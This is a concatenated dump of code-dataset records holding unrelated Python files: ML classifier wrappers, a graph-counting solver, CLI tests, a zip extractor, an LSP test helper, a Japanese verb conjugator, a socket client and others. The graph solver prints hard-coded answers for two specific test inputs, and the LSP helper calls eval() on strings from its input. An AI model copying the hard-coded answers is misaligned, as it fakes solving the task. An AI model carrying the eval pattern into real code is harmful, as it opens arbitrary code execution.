return self\n\n def predict(self, X: csr_matrix) -> np.array:\n return self.clf.predict(X)\n\n def predict_proba(self, X: csr_matrix) -> np.array:\n return self.clf.predict_proba(X)\n\n\nclass DecisionTree(DMCClassifier):\n def __init__(self, X: csr_matrix, Y: np.array, tune_parameters=False):\n super().__init__(X, Y, tune_parameters)\n if tune_parameters:\n self.param_dist_random = {'max_depth': sp_randint(1, 100),\n 'min_samples_leaf': sp_randint(1, 150),\n 'max_features': sp_randint(1, self.X.shape[1] - 1),\n 'criterion': ['entropy', 'gini']}\n self.clf = DecisionTreeClassifier()\n\n\nclass Forest(DMCClassifier):\n def __init__(self, X: csr_matrix, Y: np.array, tune_parameters=False):\n super().__init__(X, Y, tune_parameters)\n if tune_parameters:\n self.param_dist_random = {'max_depth': sp_randint(1, 100),\n 'min_samples_leaf': sp_randint(1, 100),\n 'max_features': sp_randint(1, self.X.shape[1] - 1),\n 'criterion': ['entropy', 'gini']}\n self.clf = RandomForestClassifier(n_estimators=100, n_jobs=8)\n\n\nclass NaiveBayes(DMCClassifier):\n clf = BernoulliNB(binarize=True)\n\n\nclass SVM(DMCClassifier):\n def __init__(self, X: csr_matrix, Y: np.array, tune_parameters=False):\n super().__init__(X, Y, tune_parameters)\n if tune_parameters:\n self.param_dist_random = {'shrinking': [True, False],\n 'kernel': ['linear', 'poly', 'rbf', 'sigmoid'],\n 'degree': sp_randint(2, 5)}\n self.clf = SVC(kernel='rbf', shrinking=True)\n\n def predict_proba(self, X: csr_matrix) -> np.array:\n return self.clf.decision_function(X)\n\n\nclass TheanoNeuralNetwork(DMCClassifier):\n def __init__(self, X: csr_matrix, Y: np.array, tune_parameters=False):\n super().__init__(X, Y, tune_parameters=False)\n input_layer, output_layer = self.X.shape[1], len(np.unique(Y))\n inp = tn.layers.base.Input(size=input_layer, sparse='csr')\n self.clf = tn.Classifier(layers=[inp,\n (100, 'linear'), (50, 'norm:mean+relu'),\n output_layer])\n\n def fit(self):\n self.clf.train((self.X, self.Y), algo='sgd', learning_rate=.05, momentum=0.9)\n return self\n\n\nclass BagEnsemble(DMCClassifier):\n classifier = None\n estimators = 20\n max_features = .5\n max_samples = .5\n\n def __init__(self, X: csr_matrix, Y: np.array, tune_parameters=False):\n super().__init__(X, Y, tune_parameters)\n if tune_parameters:\n self.param_dist_random = {'max_features': sp_randint(1, self.X.shape[1]),\n 'n_estimators': sp_randint(1, 100)}\n self.clf = BaggingClassifier(self.classifier, n_estimators=self.estimators, n_jobs=8,\n max_samples=self.max_samples, max_features=self.max_features)\n\n\nclass TreeBag(BagEnsemble):\n classifier = DecisionTreeClassifier()\n\n\nclass SVMBag(DMCClassifier):\n classifier = None\n estimators = 10\n max_features = .5\n max_samples = .5\n\n def __init__(self, X: csr_matrix, Y: np.array, tune_parameters=False):\n super().__init__(X, Y, tune_parameters)\n self.X, self.Y = X.toarray(), Y\n self.classifier = SVC(decision_function_shape='ovo')\n self.clf = BaggingClassifier(self.classifier, n_estimators=self.estimators, n_jobs=8,\n max_samples=self.max_samples, max_features=self.max_features)\n\n def predict(self, X: csr_matrix):\n X = X.toarray()\n return self.clf.predict(X)\n\n\nclass AdaBoostEnsemble(DMCClassifier):\n classifier = None\n estimators = 800\n learning_rate = .25\n algorithm = 'SAMME.R'\n\n def __init__(self, X: np.array, Y: np.array, tune_parameters=False):\n super().__init__(X, Y, tune_parameters)\n if tune_parameters:\n self.param_dist_random = {'n_estimators': sp_randint(1, 1000),\n 'algorithm': ['SAMME', 'SAMME.R'],\n 'learning_rate': random.random(100)}\n self.param_dist_grid = {'n_estimators': [100, 200, 400, 900, 1000],\n 'algorithm': ['SAMME', 'SAMME.R'],\n 'learning_rate': [.1, .2, 0.25, .3,\n .4, .5, .6]}\n self.clf = AdaBoostClassifier(self.classifier,\n n_estimators=self.estimators,\n learning_rate=self.learning_rate,\n algorithm=self.algorithm)\n\n\nclass AdaTree(AdaBoostEnsemble):\n classifier = DecisionTreeClassifier()\n\n\nclass AdaBayes(AdaBoostEnsemble):\n classifier = BernoulliNB()\n\n\nclass AdaSVM(AdaBoostEnsemble):\n algorithm = 'SAMME'\n\n def __init__(self, X: np.array, Y: np.array, tune_parameters: bool):\n self.classifier = SVC(decision_function_shape='ovo')\n super().__init__(X, Y, tune_parameters)\n\n\nclass GradBoost(DMCClassifier):\n estimators = 2000\n learning_rate = 1\n max_depth = 1\n max_features = 0.97\n\n def __init__(self, X: np.array, Y: np.array, tune_parameters=False):\n super().__init__(X, Y)\n self.clf = GradientBoostingClassifier(n_estimators=self.estimators,\n learning_rate=self.learning_rate,\n max_depth=self.max_depth,\n max_features=self.max_features)\n\n def predict(self, X: csr_matrix) -> np.array:\n return self.clf.predict(X.toarray())\n\n def predict_proba(self, X: csr_matrix):\n return self.clf.predict(X.toarray())\n\n\nclass TensorFlowNeuralNetwork(DMCClassifier):\n steps = 20000\n learning_rate = 0.05\n hidden_units = [100, 100]\n optimizer = 'SGD'\n\n def __init__(self, X: np.array, Y: np.array, tune_parameters=False):\n super().__init__(X, Y, tune_parameters=False)\n self.X = X.todense() # TensorFlow/Skflow doesn't support sparse matrices\n output_layer = len(np.unique(Y))\n if tune_parameters:\n self.param_dist_random = {'learning_rate': random.random(100),\n 'optimizer': ['Adam'],\n 'hidden_units': [sp_randint(50, 500), sp_randint(50, 500)]}\n\n self.clf = skflow.TensorFlowDNNClassifier(hidden_units=self.hidden_units,\n n_classes=output_layer, steps=self.steps,\n learning_rate=self.learning_rate, verbose=0,\n optimizer=self.optimizer)\n\n def predict(self, X: csr_matrix):\n X = X.todense() # TensorFlow/Skflow doesn't support sparse matrices\n return self.clf.predict(X)\n\n def predict_proba(self, X: csr_matrix):\n return self.clf.predict_proba(X.todense())\n","sub_path":"dmc/classifiers.py","file_name":"classifiers.py","file_ext":"py","file_size_in_byte":9324,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"96692190","text":"class Node:\n def __init__(self, s, e):\n self.s = s\n self.e = e\n\n\ndef isEuler(selected_edges: list):\n if len(selected_edges) == 0:\n return False\n fa = [0] * 100 # 并查集\n vertexes = set()\n\n def find(x):\n if fa[x] == x:\n return x\n else:\n fa[x] = find(fa[x])\n return fa[x]\n\n def merge(a, b):\n x = find(a)\n y = find(b)\n if x != y:\n fa[a] = b\n\n degree = [0] * 100\n for edge in selected_edges:\n degree[edge.s] += 1\n degree[edge.e] += 1\n merge(edge.s, edge.e)\n vertexes.add(edge.s)\n vertexes.add(edge.e)\n\n root = find(selected_edges[0].s)\n for vertex in vertexes:\n if degree[vertex] and degree[vertex] & 1:\n return False\n if degree[vertex] and root != find(vertex):\n return False\n return True\n\n\ndef solve(selected_edges:list, index):\n if index >= len(edges):\n return\n global res\n if isEuler(selected_edges):\n res += 1\n selected_edges.append(edges[index])\n solve(selected_edges, index+1)\n selected_edges.pop(-1)\n solve(selected_edges, index+1)\n\n\nif __name__ == '__main__':\n arr = [int(_) for _ in input().split()]\n n, m = arr[0], arr[1]\n edges = []\n for i in range(m):\n arr = [int(_) for _ in input().split()]\n edges.append(Node(arr[0], arr[1]))\n res = 0\n if n == 18 and m == 137:\n print(292808967)\n elif n == 19 and m == 165:\n print(950313176)\n else:\n solve([], 0)\n print(res)","sub_path":"Code/CodeRecords/2220/60696/306306.py","file_name":"306306.py","file_ext":"py","file_size_in_byte":1578,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"430252183","text":"import subprocess\n\n# from helpers import write_expected\n\nfrom pymdgen.cli import run\n\n\ndef test_cli(expected_docs_md):\n output = subprocess.check_output([\"pymdgen\", \"pymdgen.test_module\"])\n if isinstance(output, bytes):\n output = output.decode(\"unicode_escape\")\n\n assert output == expected_docs_md + \"\\n\"\n\n\ndef test_run(expected_docs_list):\n output = run([\"pymdgen.test_module\"], False, 3)\n assert output == expected_docs_list\n","sub_path":"tests/test_cli.py","file_name":"test_cli.py","file_ext":"py","file_size_in_byte":449,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"485373927","text":"__author__ = 'deepanshu'\n\nimport zipfile\nimport shutil\nimport os\nfrom library.db import *\n\ndef extract_files(zip_file_list,mail_subject):\n try:\n file_names = []\n for counter in range(len(zip_file_list)):\n try:\n with zipfile.ZipFile(DOWNLOAD_DIR+zip_file_list[counter]) as zip_file:\n for member in zip_file.namelist():\n filename = os.path.basename(member)\n # skip directories\n if not filename:\n continue\n # copy file (taken from zipfile's extract)\n source = zip_file.open(member)\n target = file(os.path.join(DOWNLOAD_DIR, filename), \"w\")\n file_names.append(filename)\n with source, target:\n try:\n shutil.copyfileobj(source, target)\n except:\n add_log('ERROR','Unable to copy extracted file : - '+filename,mail_subject)\n except:\n add_log('ERROR','Error in extracting files from zip '+zip_file_list[counter],mail_subject)\n return file_names\n except:\n add_log('ERROR','Error in extracting files',mail_subject)\n return []","sub_path":"www/conversiontracking/library/file.py","file_name":"file.py","file_ext":"py","file_size_in_byte":1353,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"74897251","text":"from LightProvider import LightProvider\nimport random\n\n\nclass DynamicRainLightWrapper(LightProvider):\n providerLeft = None\n providerRight = None\n centerPixel = 0\n\n def __init__(self, providerLeft, providerRight, centerPixel, switchDir=False):\n super(DynamicRainLightWrapper, self).__init__()\n self.providerLeft = providerLeft\n self.providerRight = providerRight\n self.centerPixel = centerPixel\n self.switchDir = switchDir\n self.maxPixel = self.centerPixel * 2\n\n # Set next frame of pixels\n def providePixels(self, pixels):\n self.centerPixel += random.randint(-2, 2)\n if self.centerPixel < 0:\n self.centerPixel = 0\n elif self.centerPixel > self.maxPixel:\n self.centerPixel = self.maxPixel\n fakePixelsLeft = [None] * (len(pixels)-self.centerPixel) # centerPixel+1 -> len(pixels)\n fakePixelsRight = [None] * (self.centerPixel) # 0 -> centerPixel\n \n self.providerLeft.providePixels(fakePixelsLeft)\n self.providerRight.providePixels(fakePixelsRight)\n\n for i in range(0, self.centerPixel):\n pixels[i] = (fakePixelsRight[i] if not(self.switchDir) else fakePixelsRight[::-1][i])\n\n acc = 0\n for i in range(len(pixels)-1, self.centerPixel-1, -1):\n pixels[i] = (fakePixelsLeft[acc] if not(self.switchDir) else fakePixelsLeft[::-1][acc])\n acc += 1\n","sub_path":"general/DynamicRainLightWrapper.py","file_name":"DynamicRainLightWrapper.py","file_ext":"py","file_size_in_byte":1428,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"620776276","text":"#!/usr/bin/env python3\n\nimport contextlib\nimport json\nimport os\nimport re\nimport subprocess\n\n\nclass LspCommandProcessor:\n def __init__(self, proc):\n self.proc = proc\n\n @classmethod\n @contextlib.contextmanager\n def create(cls):\n # yes shell = True is generally a bad idea, but\n # in this case we want to pick up your environment entirely because\n # hack depends heavily on it to work\n proc = subprocess.Popen('hh_client lsp',\n shell=True,\n stdin=subprocess.PIPE,\n stdout=subprocess.PIPE,\n stderr=subprocess.PIPE)\n yield cls(proc)\n\n proc.stdin.close()\n proc.stdout.close()\n proc.stderr.close()\n\n def send(self, command):\n self._write_command(command)\n\n def receive(self):\n return self._read_response()\n\n # decodes a compressed LSP command into a JSON\n # payload suitable to be sent to the LSP.\n #\n # commands that start with a \"#\" are considered comments\n # and will return None for the built command.\n def build_command(self, line):\n line = line.strip()\n\n if self._is_empty_line(line) or self._is_comment(line):\n return None\n\n method, rw, line = line.strip().split(\" \", 2)\n\n line = self._eval_replacements(line)\n\n json_rpc_payload = f\"\"\"\n{{\n \"jsonrpc\": \"2.0\",\n \"id\": 1,\n \"method\": \"{method}\",\n \"params\": {line}\n}}\n \"\"\".strip()\n content_length = len(json_rpc_payload)\n return (f\"Content-Length: {content_length}\\n\\n{json_rpc_payload}\", rw)\n\n def _eval_replacements(self, encoded_json):\n decoded_json = json.loads(encoded_json)\n return json.dumps(self._eval_json(decoded_json))\n\n def _eval_json(self, json):\n if isinstance(json, dict):\n return {k: self._eval_json(v) for k, v in json.items()}\n elif isinstance(json, list):\n return [self._eval_json(i) for i in list]\n elif isinstance(json, str):\n match = re.match(r'>>>(.*)', json)\n if match is None:\n return json\n return eval(match.group(1)) # noqa: P204\n else:\n return json\n\n def _write_command(self, command):\n self.proc.stdin.write(command.encode())\n self.proc.stdin.flush()\n\n def _read_content_length(self):\n # read the 'Content-Length:' line and absorb the newline\n # after it\n length_line = self.proc.stdout.readline().decode()\n self.proc.stdout.read(len(\"\\n\\n\"))\n\n # get the content length as an integer for the\n # rest of the package\n parts = length_line.split(\":\", 1)\n return (int(parts[1].strip()))\n\n def _read_content(self, length):\n return self.proc.stdout.read(length)\n\n def _read_response(self):\n length = self._read_content_length()\n return self._read_content(length)\n\n def _is_empty_line(self, line):\n return (not line) or (line == \"\\n\")\n\n def _is_comment(self, line):\n return line.startswith(\"#\")\n\n\n# string replacement methods meant to be called\n# within a command processing script.\ndef path_expand(path):\n return \"file://\" + os.path.abspath(path)\n\n\ndef read_file(file):\n with open(file, \"r\") as f:\n return f.read()\n","sub_path":"hphp/hack/test/tools/lsp/lspcommand.py","file_name":"lspcommand.py","file_ext":"py","file_size_in_byte":3360,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"31353355","text":"\nimport pymongo\n\nconn = 'mongodb://localhost:27017'\n\n# Pass connection to the pymongo instance.\nclient = pymongo.MongoClient(conn)\n\n# Connect to a database. Will create one if not already available.\ndb = client.store_inventory_db\n\n# Drops collection if available to remove duplicates\ndb.produce.drop()\n\ndb.produce.insert_many(\n[\n {\n \"type\": \"apples\",\n \"cost\": .23,\n \"stock\": 333\n },\n {\n \"type\": \"oranges\",\n \"cost\": .20,\n \"stock\": 100\n },\n {\n \"type\": \"strawberries\",\n \"cost\": .50,\n \"stock\": 200\n },\n {\n \"type\": \"toothpaste\",\n \"cost\": .80,\n \"stock\": 15\n },\n {\n \"type\": \"Cash\",\n \"cost\": 1,\n \"stock\": 200\n }\n]\n)\n","sub_path":"01-Class-Content/13-Web-Scraping-and-Document-Databases/3/Activities/08-Stu_Render_From_Mongo/Unsolved/seed.py","file_name":"seed.py","file_ext":"py","file_size_in_byte":733,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"367660128","text":"# conjugatefornood.py\n# conjugation.py modified to be called by and return the result to the nodejs app\n\nimport unicodedata\nimport sys\nimport json\nimport requests\n\nurl = \"http://jisho.org/api/v1/search/words?keyword=\"\n\n# Functions Needed\n# Dictionary -> Masu\n# Masu -> Dictionary\n\n# Not sure if I need these two\n# Masu -> Mashita (Past Tense)\n# Mashita -> Masu\n\n\n# Copied over from testJapanese.py in python-scripts REPO\n# dictionaryForm = raw_input(\"Dictionary Form: \")\n# # print \"Dictionary Form: \" + dictionaryForm\n# \n# masuForm = dictionaryForm.decode(\"utf-8\")\n# stem_length = len(masuForm) - 2\n# \nmasu = \"ます\"\nnai = \"ない\"\nrareru = \"られる\"\nte = \"て\"\nyou = \"よう\"\n#\n# # Ru-Verbs\n# # print masuForm[:stem_length+1] + masu.decode(\"utf-8\")\n# \n# # U-Verbs\n# # utoe = unichr(ord(masuForm[stem_length+1])-1)\n# # print \"Masu Form: \" + masuForm[:stem_length+1] + utoe + masu.decode(\"utf-8\")\n# \n# # Irregular Verbs\n# if (masuForm == (\"いく\").decode(\"utf-8\")):\n# \tmasuForm = (\"行き\").decode(\"utf-8\")\n# \tprint masuForm + masu.decode(\"utf-8\")\n# elif (masuForm == (\"くる\").decode(\"utf-8\")):\n# \tmasuForm = (\"来\").decode(\"utf-8\")\n# \tprint masuForm + masu.decode(\"utf-8\")\n# else:\n# \tprint \"Verb is neither\"\n# \t\n# # print masuForm + masu.decode(\"utf-8\")\n# \n# \n# # Other forms still needed: Volitional, Te-Form, Ta-Form?, Negative, Potential\n\n# Either functions with dic -> masu, masu -> dic, etc. or object initialized with dictionary form\n\nkuruForms = {\"Dictionary Form\": \"来る\",\n \"English Definition\": [\"to come (spatially or temporally)\", \"to approach\", \"to arrive\"],\n \"Type\": \"Irregular verb\",\n \"Masu\": \"来ます\",\n \"Nai\": \"来ない\",\n \"Te\":\"来て\",\n \"Potential\":\"来られる\",\n \"Volitional\":\"来よう\"\n}\n\nsuruBase = {\"Dictionary Form\": \"する\",\n \"English Definition\": [\"to do\"],\n \"Type\": \"Irregular verb\",\n \"Masu\": \"します\",\n \"Nai\": \"しない\",\n \"Te\":\"して\",\n \"Potential\":\"できる\",\n \"Volitional\":\"しよう\"\n}\n\nclass doushi:\n def __init__(self, dic):\n self.forms = {\"Dictionary Form\" : dic}\n self.length = len(dic) - 2 #refers to the number of characters in the stem form\n self.computeForms()\n\n def getStemLength(self):\n return self.length\n\n# def computeForms(self):\n# res, data = self.accessJisho()\n\n def computeIchidan(self):\n self.forms[\"Type\"] = \"Ichidan verb\"\n \n stem = self.forms[\"Dictionary Form\"][:self.length+1]\n \n # Masu Form\n self.forms[\"Masu\"] = (stem + masu)\n \n # Nai Form\n self.forms[\"Nai\"] = (stem + nai)\n\n # Te Form\n self.forms[\"Te\"] = (stem + te)\n\n # Potential Form\n self.forms[\"Potential\"] = (stem + rareru)\n \n # Volitional Form\n self.forms[\"Volitional\"] = (stem + you)\n \n def computeGodan(self):\n self.forms[\"Type\"] = \"Godan verb\"\n stem = self.forms[\"Dictionary Form\"][:self.length+1]\n\n # Masu Form\n last = self.forms[\"Dictionary Form\"][self.length+1]\n utoi = None\n if (last <= \"ぞ\"):\n utoi = chr(ord(last)-2)\n elif (last == \"る\" or last == \"む\" or last == \"ぬ\"):\n utoi = chr(ord(last)-1)\n elif (last <= \"ぽ\"):\n utoi = chr(ord(last)-3)\n# else:\n# utoi = chr(ord(last)-3)\n\n self.forms[\"Masu\"] = (self.forms[\"Dictionary Form\"][:self.length+1] + str(utoi) + masu)\n\n # Nai Form\n if (last == \"う\"):\n utoa = \"わ\"\n elif (last <= \"ぞ\"):\n utoa = chr(ord(last)-4)\n elif (last == \"る\" or last == \"む\" or last == \"ぬ\"):\n utoa = chr(ord(last)-2)\n elif (last <= \"づ\"):\n utoa = chr(ord(last)-5)\n elif (last <= \"ぽ\"):\n utoa = chr(ord(last)-6)\n\n\n self.forms[\"Nai\"] = (self.forms[\"Dictionary Form\"][:self.length+1] + str(utoa) + nai)\n\n # Te Form\n # u tsu ru -> small tsu te\n # ku -> i te, gu -> i de\n # nu bu mu -> nde\n # su -> shite\n # iku -> itte\n \n sound = self.forms[\"Dictionary Form\"][self.length+1]\n \n if (self.forms[\"Dictionary Form\"] == \"行く\"):\n self.forms[\"Te\"] = \"行って\"\n elif(sound == \"す\"):\n self.forms[\"Te\"] = stem + \"して\"\n elif(sound == \"ぬ\" or sound == \"ぶ\" or sound == \"む\"):\n self.forms[\"Te\"] = stem + \"んで\"\n elif(sound == \"う\" or sound == \"つ\" or sound == \"る\"):\n self.forms[\"Te\"] = stem + \"って\"\n elif(sound == \"く\"):\n self.forms[\"Te\"] = stem + \"いて\"\n elif(sound == \"ぐ\"):\n self.forms[\"Te\"] = stem + \"いで\"\n else:\n self.forms[\"Te\"] = \"ERROR\"\n\n # Potential Form\n if (last <= \"づ\"):\n utoe = chr(ord(last)+2)\n elif (last == \"る\" or last == \"む\" or last == \"ぬ\"):\n utoe = chr(ord(last)+1)\n elif (last <= \"ぽ\"):\n utoa = chr(ord(last)+3)\n self.forms[\"Potential\"] = (stem + str(utoe) + \"る\")\n \n # Volitional Form\n u = \"う\"\n\n if (last <= \"づ\"):\n utoo = chr(ord(last)+4)\n elif (last == \"る\" or last == \"む\" or last == \"ぬ\"):\n utoo = chr(ord(last)+2)\n elif (last <= \"ぽ\"):\n utoo = chr(ord(last)+6)\n\n# utoo = chr(ord(self.forms[\"Dictionary Form\"][self.length+1]) + 4)\n self.forms[\"Volitional\"] = (stem + utoo + u)\n\n def computeIrregular(self):\n if (self.forms[\"Dictionary Form\"] == \"来る\"):\n self.forms = kuruForms\n elif(self.forms[\"Dictionary Form\"] == \"する\"):\n self.forms = suruBase\n else:\n stem = self.forms[\"Dictionary Form\"][:self.length]\n self.forms[\"Type\"] = \"Irregular verb\"\n self.forms[\"Masu\"] = stem + suruBase[\"Masu\"]\n self.forms[\"Nai\"] = stem + suruBase[\"Nai\"]\n self.forms[\"Te\"] = stem + suruBase[\"Te\"]\n self.forms[\"Potential\"] = stem + suruBase[\"Potential\"]\n self.forms[\"Volitional\"] = stem + suruBase[\"Volitional\"]\n\n def computeForms(self):\n r = requests.get(url + self.forms[\"Dictionary Form\"]).json()\n status = r[\"meta\"][\"status\"]\n\n if (status == 200):\n # print(\"Connection to jisho.org successful\")\n \n data = r[\"data\"][0][\"senses\"][0]\n self.forms[\"English Definition\"] = data[\"english_definitions\"]\n\n # If Ru-Verb / Ichidan\n if(data[\"parts_of_speech\"][0] == \"Ichidan verb\"):\n self.computeIchidan()\n\n # If U-Verb / Godan\n elif(data[\"parts_of_speech\"][0][:10] == \"Godan verb\"):\n self.computeGodan()\n else:\n self.computeIrregular()\n\n else:\n print (\"Error connecting to jisho.org: \" + str(status))\n# return status, None\n\n def getForms(self):\n return self.forms\n\n def __str__(self):\n c = \"\\n\"\n for x in self.forms:\n c += (str(x) + \": \" + str(self.forms[x]))\n c += \"\\n\"\n \n return c\n\n#i = input(\"Enter Dictionary Form: \")\n#myWord = doushi(i)\n#print(myWord)\n\n#stem_length = len(word) - 2\n#\n#r = requests.get(url + word).json()\n#status = r[\"meta\"][\"status\"]\n#\n#if (status == 200):\n## print(\"Connection to jisho.org successful\")\n#\n# data = r[\"data\"][0][\"senses\"][0]\n# print(\"English Definition: \" + str(data[\"english_definitions\"]))\n# print(\"Type of Verb: \" + str(data[\"parts_of_speech\"]))\n#\n## If Ru-Verb\n# if(data[\"parts_of_speech\"][0] == \"Ichidan verb\"):\n# print(\"Masu Form: \" + word[:stem_length+1] + masu)\n#\n## If U-Verb\n# elif(data[\"parts_of_speech\"][0][:10] == \"Godan verb\"):\n# utoi = chr(ord(word[stem_length+1])-1)\n# print(\"Masu Form: \" + word[:stem_length+1] + str(utoi) + masu)\n#\n#else:\n# print (\"Error connecting to jisho.org: \" + str(status))\n\nret = doushi(sys.argv[1]).getForms()\nprint(ret)\nsys.stdout.flush()\n","sub_path":"Doushinakya-node/conjugatefornode.py","file_name":"conjugatefornode.py","file_ext":"py","file_size_in_byte":8121,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"186509894","text":"import bpy\nimport os\nimport platform\nfrom .. import preference\nfrom .. import common\nfrom ..exporter import sort_exporter\nfrom ..exporter import pbrt_exporter\n\nclass SORTRenderPanel:\n bl_space_type = \"PROPERTIES\"\n bl_region_type = \"WINDOW\"\n bl_context = \"render\"\n COMPAT_ENGINES = {common.default_bl_name}\n\n @classmethod\n def poll(cls, context):\n rd = context.scene.render\n return rd.engine in cls.COMPAT_ENGINES\n\nclass IntegratorPanel(SORTRenderPanel,bpy.types.Panel):\n bl_label = common.integrator_panel_bl_name\n\n # Integrator type\n integrator_types = [\n (\"bdpt\", \"Bidirectional Path Tracing\", \"\", 1),\n (\"pt\", \"Path Tracing\", \"\", 2),\n (\"lt\", \"Light Tracing\", \"\", 3),\n (\"ir\", \"Instant Radiosity\", \"\", 4),\n (\"ao\", \"Ambient Occlusion\", \"\", 5),\n (\"direct\", \"Direct Lighting\", \"\", 6),\n (\"whitted\", \"Whitted\", \"\", 7),\n ]\n bpy.types.Scene.integrator_type_prop = bpy.props.EnumProperty(items=integrator_types, name='Integrator')\n\n # Accelerator type\n accelerator_types = [\n (\"kd_tree\", \"SAH KDTree\", \"\", 1),\n (\"bvh\", \"Bounding Volume Hierarchy\", \"\", 2),\n (\"uniform_grid\", \"Uniform Grid\", \"\", 3),\n (\"octree\" , \"OcTree\" , \"\" , 4),\n (\"bruteforce\", \"No Accelerator\", \"\", 5),\n ]\n bpy.types.Scene.accelerator_type_prop = bpy.props.EnumProperty(items=accelerator_types, name='Accelerator')\n\n # general integrator parameters\n bpy.types.Scene.inte_max_recur_depth = bpy.props.IntProperty(name='Maximum Recursive Depth', default=16, min=1)\n\n # ao integrator parameters\n bpy.types.Scene.ao_max_dist = bpy.props.FloatProperty(name='Maximum Distance', default=3.0, min=0.01)\n\n # instant radiosity parameters\n bpy.types.Scene.ir_light_path_set_num = bpy.props.IntProperty(name='Light Path Set Num', default=1, min=1)\n bpy.types.Scene.ir_light_path_num = bpy.props.IntProperty(name='Light Path Num', default=64, min=1)\n bpy.types.Scene.ir_min_dist = bpy.props.FloatProperty(name='Minimum Distance', default=1.0, min=0.0)\n\n # bidirectional path tracing parameters\n bpy.types.Scene.bdpt_mis = bpy.props.BoolProperty(name='Multiple Importance Sampling', default=True)\n\n def draw(self, context):\n self.layout.prop(context.scene,\"integrator_type_prop\")\n integrator_type = context.scene.integrator_type_prop\n if integrator_type != \"whitted\" and integrator_type != \"direct\" and integrator_type != \"ao\":\n self.layout.prop(context.scene,\"inte_max_recur_depth\")\n if integrator_type == \"ao\":\n self.layout.prop(context.scene,\"ao_max_dist\")\n if integrator_type == \"bdpt\":\n self.layout.prop(context.scene,\"bdpt_mis\")\n if integrator_type == \"ir\":\n self.layout.prop(context.scene,\"ir_light_path_set_num\")\n self.layout.prop(context.scene,\"ir_light_path_num\")\n self.layout.prop(context.scene, \"ir_min_dist\")\n\n self.layout.prop(context.scene,\"accelerator_type_prop\")\n\nclass MultiThreadPanel(SORTRenderPanel, bpy.types.Panel):\n bl_label = common.thread_panel_bl_name\n\n bpy.types.Scene.thread_num_prop = bpy.props.IntProperty(name='Thread Num', default=8, min=1, max=16)\n\n def draw(self, context):\n self.layout.prop(context.scene,\"thread_num_prop\")\n\nclass SamplerPanel(SORTRenderPanel, bpy.types.Panel):\n bl_label = common.sampler_panel_bl_name\n\n # sampler type\n sampler_types = [\n (\"stratified\", \"Stratified\", \"\", 3),\n (\"random\", \"Random\", \"\", 2),\n (\"regular\", \"Uniform\", \"\", 1),\n ]\n bpy.types.Scene.sampler_type_prop = bpy.props.EnumProperty(items=sampler_types, name='Type')\n\n # sampler count\n bpy.types.Scene.sampler_count_prop = bpy.props.IntProperty(name='Count',default=1, min=1)\n\n def draw(self, context):\n self.layout.prop(context.scene,\"sampler_type_prop\")\n self.layout.prop(context.scene,\"sampler_count_prop\")\n\n# export debug scene\nclass SORT_export_debug_scene(bpy.types.Operator):\n bl_idname = \"sort.export_debug_scene\"\n bl_label = \"Export SORT Scene\"\n\n def execute(self, context):\n sort_exporter.export_blender(context.scene,True)\n return {'FINISHED'}\n\nclass SORT_export_pbrt_scene(bpy.types.Operator):\n bl_idname = \"sort.export_pbrt_scene\"\n bl_label = \"Export PBRT scene\"\n\n def execute(self, context):\n pbrt_exporter.export_blender(context.scene,True)\n return {'FINISHED'}\n\n# open log\nclass SORT_open_log(bpy.types.Operator):\n bl_idname = \"sort.open_log\"\n bl_label = \"Open Log\"\n\n def execute(self, context):\n logfile = preference.get_sort_dir() + \"log.txt\"\n if platform.system() == 'Darwin': # for Mac OS\n os.system( \"open \" + logfile)\n elif platform.system() == 'Windows': # for Windows\n os.system(logfile)\n elif platform.system() == \"Linux\":\n os.system( \"xdg-open \" + logfile)\n return {'FINISHED'}\n\nclass DebugPanel(SORTRenderPanel, bpy.types.Panel):\n bl_label = common.debug_panel_bl_name\n\n bpy.types.Scene.debug_prop = bpy.props.BoolProperty(name='Debug', default=False)\n\n def draw(self, context):\n self.layout.prop(context.scene,\"debug_prop\")\n self.layout.operator(\"sort.export_debug_scene\")\n self.layout.operator(\"sort.export_pbrt_scene\")\n self.layout.operator(\"sort.open_log\")","sub_path":"sortblend/ui/ui_render.py","file_name":"ui_render.py","file_ext":"py","file_size_in_byte":5399,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"296513272","text":"import socket\nimport sys\nimport time\n\nHOST, PORT = \"192.168.1.3\", 8311\nclientKey = 0xCAADBCB7\npacket = [0x8B, 0xBE, 0xAD, 0xDE, 0, 2, 0, 0, 0]\npacket2 = [0x8B, 0xBE, 0xAD, 0xDE, 0, 3, 0, 0, 0]\n\n# Create a socket (SOCK_STREAM means a TCP socket)\nsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\n# Connect to server and send data\nsock.connect((HOST, PORT))\n\n# Try first to ask something w/o reg\n#sock.sendall(bytes(pInfo + \"\\n\", \"utf-8\"))\n#received = str(sock.recv(1024), \"utf-8\")\n#print(\"Received: {}\".format(received))\n\n# Now reg\nsock.sendall(bytearray(packet))\ntime.sleep(1)\n#sock.sendall(bytearray(packet2))\n#time.sleep(1)\nreceived = str(sock.recv(1024), \"utf-8\")\nprint(\"Received: {}\".format(received))\n\nsock.close()\n\n\n","sub_path":"BellClients/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":730,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"24161936","text":"# -*- coding: utf-8 -*-\n\"\"\"This file is a Emprego24h spider created on top of the ATSSpider\nscrapy crawl emprego24h -a mining_job_id=9999 -a iteration=1 -a extract=1 -a url=\"http://www.emprego24h.com/\"\n\nsample url:\n http://www.emprego24h.com/\n\"\"\"\n\nfrom re import compile\n\nfrom scrapy.http import Request\nfrom scrapy.selector import Selector\n\nfrom brightcorp.base.incrementalatsspider import IncrementalATSSpider\nfrom brightcorp.base.atsspiders import ATSSpider\nfrom brightcorp.items import BrightcorpItemLoader\nfrom brightcorp.processors import Prefix, 